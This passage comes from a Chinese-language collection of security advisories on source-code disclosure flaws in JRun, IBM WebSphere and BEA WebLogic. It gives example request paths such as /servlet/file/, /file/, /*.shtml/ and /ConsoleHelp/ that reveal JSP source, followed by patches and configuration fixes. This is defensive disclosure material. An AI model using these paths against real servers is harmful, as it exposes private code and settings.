http://www.xxx.xxx/servlet/SessionServlet 會暴露當前伺服器保持的HTTP連接信息。JRUN_HOME/jsm-default/services/jws/htdocs 目錄下的內容也應被刪除掉。這個目錄保存有演示伺服器功能的 '.jsp' 文件，其中一些文件牽涉到訪問伺服器文件系統和暴露伺服器設置的問題。例如對文件 "viewsource.jsp" 的路徑檢查是默認關閉的，它可被用於訪問伺服器文件系統。

解決方案：

1）安裝 2.3.3 service pack
2）從伺服器上刪除所有的說明文檔、演示編碼、範例和教材，包括安裝 JRun 2.3.x 時存放於 JRUN_HOME/servlets 目錄和JRUN_HOME/jsm-default/services/jws/htdocs 目錄里的文檔。
相關站點：http://www.allaire.com/

IBM WebSphere Application Server有哪些漏洞？

1、IBM WebSphere Application Server 3.0.2 存在暴露源代碼漏洞
IBM WebSphere Application Server 允許攻擊者查看 Web server 根目錄以上的所有文件。IBM WebSphere 使用 Java Servlets 處理多種頁面類型的分析(如 HTML, JSP, JHTML, 等等)。In addition 不同的 servlets 對不同的頁面進行處理，如果一個請求的文件是未進行注冊管理的，WebSphere 會使用一個默認的 servlet 作調用。如果文件路徑以"/servlet/file/"作開頭這個默認的 servlet 會被調用這個請求的文件會未被分析或編譯就顯示出來。

受影響系統：IBM WebSphere 3.0.2 的所有版本

舉例：

如果一個請求文件的 URL 為 "login.jsp":： http://site.running.websphere/login.jsp那麼訪問 http://site.running.websphere/servlet/file/login.jsp將看到這個文件的源代碼。
解決方案：下載並安裝補丁
http://www-4.ibm.com/software/webservers/appserv/efix.html
相關站點：http://www-4.ibm.com/software/webservers/appserv/
IBM WebSphere Application Server 暴露JSP文件內容
Java Server Pages (JSP)類型的文件是以'.jsp'擴展名在WebSphere Application Serve 上注冊，WebSphere 是文件名大小寫敏感的，'.jsp'和'.JSP'是不同類型的文件擴展名。如果提交有'.JSP'的鏈接給WebSphere,而WebSphere找不到'.JSP'就會以默認的'.text'文件類型來響應請求。因為在NT系統中大小寫文件名是非敏感的，所以被請求的文件會以文本的形式送出。

如果在UNIX伺服器上會出現"file not found"的錯誤信息。

解決方案：點擊此處下載補丁
相關站點：http://www-4.ibm.com/software/webservers/appserv/efix.html
BEA WebLogic有哪些暴露源代碼漏洞？

受影響版本：

所有系統上的

BEA WebLogic Enterprise 5.1.x
BEA WebLogic Server and Express 5.1.x
BEA WebLogic Server and Express 4.5.x
BEA WebLogic Server and Express 4.0.x
BEA WebLogic Server and Express 3.1.8
這個漏洞使攻擊者能讀取 Web 目錄下所有文件的源代碼。

WebLogic 依賴四個主要 Java Servlets to 服務不同類型的文件。這些 servlets 是：

1）FileServlet - for 簡單 HTML 頁面
2）SSIServlet - for Server Side Includes 頁面
3）PageCompileServlet - for JHTML 頁面
4）JSPServlet - for Java Server 頁面

看著weblogic.properties 文件, 這兒是各個 servlets 的注冊值：

1）weblogic.httpd.register.file=weblogic.servlet.FileServlet
2）weblogic.httpd.register.*.shtml=weblogic.servlet.ServerSideIncludeServlet
3）weblogic.httpd.register.*.jhtml=weblogic.servlet.jhtmlc.PageCompileServlet
4）weblogic.httpd.register.*.jsp=weblogic.servlet.JSPServlet
更多的 weblogic.properties 文件, 如果一個請求文件是沒有注冊管理的，那麼就會調用一個默認的 servlet 。以下是展示默認的 servlet 是如何注冊的。

# Default servlet registration
# ------------------------------------------------
# Virtual name of the default servlet if no matching servlet
# is found weblogic.httpd.defaultServlet=file
因此如果 URL 中的文件路徑開頭為 "/file/" , 將會引致 WebLogic 調用默認的 servlet, 那將會使網頁未加分析和編譯而直接顯示。

論證：

只要在想看的文件原來的 URL 路徑之前加入 "/file/" 就會讓文件未經分析和編譯，直接暴露源代碼。如：http://site.running.weblogic/login.jsp ，那麼只要訪問 http://site.running.weblogic/file/login.jsp 就會在 WEB 瀏覽器里看到文件的內容。

以下是使用方法:

1. 通過強制使用 SSIServlet 查看未分析的頁面 :
伺服器站點通過 WebLogic 中的 SSIServlet 處理頁面，它在weblogic.properties 文件中注冊以下信息：weblogic.httpd.register.*.shtml= weblogic.servlet.ServerSideIncludeServlet

通過 URL 使用 SSIServlet 自動處理通配符 （*） 。因此 如果文件路徑開頭為 /*.shtml/，將強制文件由 SSIServlet 處理。如果使用其它文件類型如 .jsp 和 .jhtml, 就能查看未分析的 jsp 和 jhtml 代碼。舉例：http://www.xxx.com/*.shtml/login.jsp

2. 通過強制使用 FileServlet 查看未分析的頁面 :
WebLogic 使用 FileServlet 配置 ConsoleHelp servlet ，在weblogic.properties 文件的以下內容可得知:

# For Console help. Do not modify.
weblogic.httpd.register.ConsoleHelp= weblogic.servlet.FileServlet
weblogic.httpd.initArgs.ConsoleHelp=\defaultFilename=/weblogic/admin/help/NoContent.html
weblogic.allow.execute.weblogic.servlet.ConsoleHelp=everyone
因此如果文件路徑以 /ConsoleHelp/ 開頭將導致 WebLogic 使用 FileServlet，使未分析或編譯的文件作頁面顯示出來，舉例：http://www.xxx.com/ConsoleHelp/login.jsp

解決方案：
不要使用示例中的設置方法設置 FileServlet 。這可能會讓你的 JSP/JHTML 文件的源代碼暴露出來。請查看在線文檔:
http://www.weblogic.com/docs51/admindocs/http.html#file

示例的 registrations 如下：
weblogic.httpd.register.file=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.file=defaultFilename=index.html
weblogic.httpd.defaultServlet=file

有兩種方法可以避免這個問題：

（1）注冊那些文件 servlet 使用隨機用戶名，加大猜測難度。例如使用象這樣注冊文件 servlet 為 12foo34：
weblogic.httpd.register.12foo34=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.12foo34=defaultFilename=index.html
weblogic.httpd.defaultServlet=12foo34

（2）注冊文件 servlet 使用 wild cards 聲明你將使用所有這些文件擴展名作服務。舉例注冊文件 servlet 為 .html 文件服務：
weblogic.httpd.register.*.html=weblogic.servlet.FileServlet
weblogic.httpd.initArgs.*.html=defaultFilename=index.html
weblogic.httpd.defaultServlet=*.html

使用上面的方法重復加入以下類型的文件 *.gif, *.jpg, *.pdf, *.txt, etc.
注意：這些信息是備有證明在 BEA WebLogic Server and Express 說明檔的：http://www.weblogic.com/docs51/admindocs/lockdown.html
另：請留意新版本並升級吧。